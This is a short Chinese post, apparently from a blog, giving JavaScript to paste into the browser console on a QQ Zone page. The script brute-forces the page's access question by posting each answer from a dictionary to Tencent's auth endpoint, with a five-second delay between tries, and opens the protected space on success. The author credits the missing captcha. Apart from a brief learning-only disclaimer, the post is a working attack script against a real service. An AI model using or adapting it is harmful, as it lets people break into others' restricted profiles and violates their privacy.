免责声明: 该代码仅限用于学习和研究目的;不得将下述内容用于非法用途
http://user.qzone.qq.com/qq号,打开开发者工具,在命令行输入如下代码
var answers = [];//字典
var con = $e(Limit.container);
var url = "http://" + baseDomain + "/cgi-bin/user/cgi_auth";
var qqzoneUrl = "http://user.qzone.qq.com/qq号";
var i=0;
function check(answer) {
var sendData = {"question": "问题内容","answer": answer ,"uin": Limit.uin,"mode": 2,"g_tk": QZFL.pluginsDefine.getACSRFToken(),"fupdate": 1};
var _loader = new QZFL.FormSender(url, "post", sendData, "gb2312");
_loader.onSuccess = function(re) {
if (re.code == 0){
alert("答案正确:"+answers[i]);
location = decodeURIComponent(qqzoneUrl);
}else{
console.log("答案错误:"+answers[i]);
i++;
if(i<answers.length){
setTimeout(function() {
check(answers[i]);
},5000);
}
}
};
_loader.send();
}
check(answers[0]);
方法很傻,递归ajax,尝试字典中所有知道的答案。
主要是腾讯没有加验证码给了我可乘之机。